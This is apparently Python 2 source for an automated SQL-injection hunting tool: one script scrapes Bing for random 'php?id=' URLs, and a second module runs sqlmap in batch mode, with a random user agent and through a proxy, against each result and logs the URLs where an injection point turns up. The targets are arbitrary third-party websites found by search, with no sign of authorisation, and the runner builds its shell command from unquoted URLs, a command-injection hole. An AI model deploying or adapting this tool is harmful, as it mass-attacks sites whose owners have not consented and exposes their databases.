# from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.phantomjs.webdriver import WebDriver
from selenium.webdriver.common.keys import Keys
import time
from pyquery import PyQuery as pq
import random
import thread
import sqlmapBat
def bingSearch():
    """Run one Bing query and hand each of the first nine result links to sqlmapBat.sqlmapInjectCheck.

    The query is ``php?id=<n>`` with ``n`` drawn from 0..9999 and carries no ``site:``
    restriction (the commented-out variant below had one), so the result links point at
    whatever third-party hosts Bing returns. Each link is dispatched on its own thread,
    which is never joined. Errors raised before the ``try`` (driver start-up, the wait
    for the Bing title, locating the form fields) propagate to the caller and leave the
    PhantomJS driver process running; errors inside the ``try`` are swallowed by the
    bare ``except``, and ``driver.quit()`` runs only through that ``finally``.
    Returns None.
    """
    # Random query suffix; note that this local shadows the builtin id().
    id = str(random.randint(0, 9999))
    # Start a PhantomJS driver (not Firefox, despite the comment this was copied with)
    # on a fixed local port. '\p' is not an escape sequence, so the backslash survives.
    driver = WebDriver(executable_path='c:\phantomjs.exe', port=5001)
    # Load the Bing home page and wait up to 20 s for its title; WebDriverWait raises
    # TimeoutException (imported above but not caught here) when that times out.
    driver.get("https://cn.bing.com/")
    WebDriverWait(driver, 20).until(EC.title_contains("Bing"))
    time.sleep(5)  # fixed settle delay on top of the explicit wait
    print(driver.title)
    # Type the query into the search box (element id sb_form_q) and, after another
    # fixed delay, click the search button (sb_form_go).
    inputElement = driver.find_element_by_id("sb_form_q")
    inputElement.send_keys("php?id="+id)
    # inputElement.send_keys("php?id=sss site:zte.com.cn inurl:sss.txt" )
    searchBtn = driver.find_element_by_id("sb_form_go")
    time.sleep(5)
    searchBtn.click()
    # inputElement.send_keys(Keys.ENTER)
    time.sleep(5)
    # submit the form (although google automatically searches now without submitting)
    # inputElement.submit()
    try:
        # b_results > li.b_pag > nav > ul > li:nth-child(2) > a
        # we have to wait for the page to refresh, the last thing that seems to be updated is the title
        WebDriverWait(driver, 20).until(EC.title_contains("php"))
        # WebDriverWait(driver,10)
        print(driver.title)
        # Writes the browser's cookies for this Bing session to stdout.
        print(driver.get_cookies())
        # Parse the rendered result page with PyQuery.
        doc = pq(driver.page_source)
        time.sleep(3)
        # Result entries 1..9 of the #b_results list; each href is handed off as-is.
        for index in range(1,10):
            # This module targets Python 2 (see `import thread` above), where bytes is
            # an alias of str; under Python 3 bytes(int) builds a zero-filled buffer and
            # the concatenation would raise TypeError.
            jq = "#b_results > li:nth-child(" + bytes(index) + ") > h2 > a"
            it =doc(jq)
            print (it.attr('href'))
            bingHref = it.attr('href')
            if bingHref:
                # Fire-and-forget thread per result link; the href string is what
                # sqlmapBat.sqlmapInjectCheck concatenates into a shell command line.
                thread.start_new(sqlmapBat.sqlmapInjectCheck, (it.attr('href'),))
    except:
        # Bare except: swallows everything raised inside the try (including the
        # TimeoutException from the wait above) and prints only a placeholder marker.
        print('ssss')
        pass
    finally:
        driver.quit()
if __name__ == "__main__":
    # Up to 99,999 search rounds, 30 s apart. Any exception escaping bingSearch
    # (e.g. a TimeoutException from its initial wait, or a driver start-up failure)
    # is swallowed silently, so a persistently failing setup simply keeps spinning here.
    for index in range(1,100000,1):
        try:
            bingSearch()
        except:
            pass
        time.sleep(30)
# -*- coding: utf-8 -*-
import os
import time
# --proxy=http://proxynj.zte.com.cn:80
# Append-only log written by writeInjectPointUrlToSuccLog. The doubled backslash is
# the correct spelling of a Windows path in a non-raw string; the other paths in this
# file rely on their backslash-letter pairs not being escape sequences.
sqlInjectSuccLogFile = 'c:\\sqlInjectSuccUrl.txt'
def sqlmapInjectCheck(url):
    """Run sqlmap against *url* through os.system and record *url* when the log shows an injection point.

    The command line is built by string concatenation: a fixed Python 2.7 interpreter
    and sqlmap.py path, ``--random-agent``, a fixed proxy, ``--batch``, ``--dbms=mysql``,
    then ``-u`` followed by *url*, with output piped through tee.exe into a per-call log
    file. *url* (a search-result href from the caller) is inserted without quoting, so
    any shell metacharacters it contains are interpreted by the shell. os.system's exit
    status is discarded and the bare ``except`` swallows every error, so the caller gets
    no signal on failure. Returns None.
    """
    # Per-call log path; '\l' is not an escape sequence so the backslash survives.
    # The '_' + '_' yields a doubled underscore (c:\log__<epoch>.txt), likely unintended.
    logName = 'c:\log_' + '_' + str(int(time.time())) + '.txt'
    # --flush - session
    try:
        cmd = 'C:\Python27\python.exe C:\Python27\sqlmap\sqlmap.py --random-agent --proxy=http://proxynj.zte.com.cn:80 --batch --dbms=mysql ' + '-u ' + url + '| c:\\tee.exe ' + logName
        # Blocking shell call; the sqlmap run's duration bounds this thread's lifetime.
        os.system(cmd)
        # The verdict is taken purely from the captured log text.
        result = checkSqlInResult(logName)
        if result == 'succ':
            writeInjectPointUrlToSuccLog(url)
    except:
        pass
def writeInjectPointUrlToSuccLog(url):
    """Append *url* plus CRLF to the log named by the module-level sqlInjectSuccLogFile.

    The file is opened in 'a+' mode on every call, so entries accumulate across runs.
    Returns None.
    """
    line = url + '\r\n'
    with open(sqlInjectSuccLogFile, 'a+') as log:
        log.write(line)
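def checkSqlInResult(filename):
    """Return 'succ' if the log at *filename* contains the success marker phrase, else ''.

    The whole file is read and searched for 'the following injection point', the phrase
    the caller treats as sqlmap having reported an injectable parameter. The file is
    opened in text mode with the platform default encoding, as before; a missing or
    unreadable file raises the open() error (IOError/OSError) to the caller.
    """
    injectSuccStr = 'the following injection point'
    with open(filename, 'r') as file_to_read:
        file_context = file_to_read.read()
    # Substring membership replaces the find() != -1 idiom; the unused local the
    # original assigned here has been dropped.
    return 'succ' if injectSuccStr in file_context else ''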
if __name__ == "__main__":
    # No standalone behaviour: this module is driven from bingSearch's threads. The
    # commented calls below are the author's manual invocation examples; the second
    # names sqlmapInjectCheckAndAnaResult, which is not defined in this file.
    pass
# sqlmapInjectCheck('https://www.sjq.cn/article.php?id=2')
# sqlmapInjectCheckAndAnaResult('http://10.42.43.10/low.php?id=1')